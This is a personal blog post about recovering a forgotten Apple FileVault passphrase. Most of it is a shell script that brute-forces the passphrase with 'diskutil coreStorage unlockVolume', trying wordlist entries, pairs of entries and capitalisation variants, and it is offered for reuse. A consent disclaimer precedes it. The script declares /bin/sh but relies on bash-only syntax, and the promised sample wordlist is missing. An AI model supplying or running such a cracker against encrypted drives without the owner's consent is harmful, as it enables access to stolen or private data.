A Simple Apple FileVault Password Cracking Script

Security Disclaimer: The script described below will only work if you have the permission and knowledge of the owner of the files you are attempting to decrypt. You may not use any of this information for any purposes without good faith and the consent of the rightful owner of the files, and I am not responsible if you or anyone else does otherwise.

Files on computers, especially laptops, become extremely vulnerable to theft when physical access to the drives is available. If your laptop is stolen, that system password isn't going to help prevent a malicious actor from opening up your computer case, pulling out the drive, and going to town with all of your personal, unencrypted data. That's why whole-drive encryption programs like Apple's FileVault are so important and useful – that is, until you forget the password.

My father gave me a 4TB drive containing all of our family photos and videos since my birth, but he has no record nor recollection of the password that he "came up with 'just for [me]'" a year ago. But FileVault has a glaring vulnerability: there are no limits on password attempts, and a simple command using DiskUtility in the command line allows anyone to make hundreds of password attempts per minute:

diskutil coreStorage unlockVolume %VOLUME_UUID% -passphrase

I created a file, words.txt, separated by returns of all the names, phrases, and numbers I could think of that might be used for a password I should be able to easily remember, e.g., pet names, street numbers, zip codes, area codes, unique family words. Then I wrote a quick shell script that brute forces with different combinations of the phrases in the wordlist text file. Behold:

#!/bin/sh
phrase=""
#parse through phrases in the text file, which is read in 
#in the last line of this script 
while read line; do
  #test normally
  phrase=$line
  echo "Testing passphrase: $phrase"
  diskutil coreStorage unlockVolume %VOLUME_UUID% -passphrase $phrase
  
  #paired test, reading in the same file in parallel
  #so we can test combinations of phrases
  while read line2; do
    #test pair normally
    phrase=$line$line2
    echo "Testing passphrase: $phrase" 
    diskutil coreStorage unlockVolume %VOLUME_UUID% -passphrase $phrase

    #test upper first letter of each word
    phrase="$(tr '[:lower:]' '[:upper:]' <<< ${line:0:1})${line:1}$(tr '[:lower:]' '[:upper:]' <<< ${line2:0:1})${line2:1}"
    echo "Testing passphrase: $phrase"
    diskutil coreStorage unlockVolume %VOLUME_UUID% -passphrase $phrase

    #test upper first word
    phrase="$(tr '[:lower:]' '[:upper:]' <<< ${line:0:1})${line:1}$line2"
    echo "Testing passphrase: $phrase"
    diskutil coreStorage unlockVolume %VOLUME_UUID% -passphrase $phrase

    #test upper second word
    phrase="$line$(tr '[:lower:]' '[:upper:]' <<< ${line2:0:1})${line2:1}"
    echo "Testing passphrase: $phrase"
    diskutil coreStorage unlockVolume %VOLUME_UUID% -passphrase $phrase
  done < "words.txt"
done < "words.txt"

If you choose to use this, don't forget to replace all instances of %VOLUME_UUID% above with the UUID of your encrypted disk, which you can find by running diskutil list in Terminal.

For obvious reasons, I haven't included my words.txt file, but an example would be formatted like this and might contain these types of personal phrases:

Drop me a line if you have any questions and have a good day!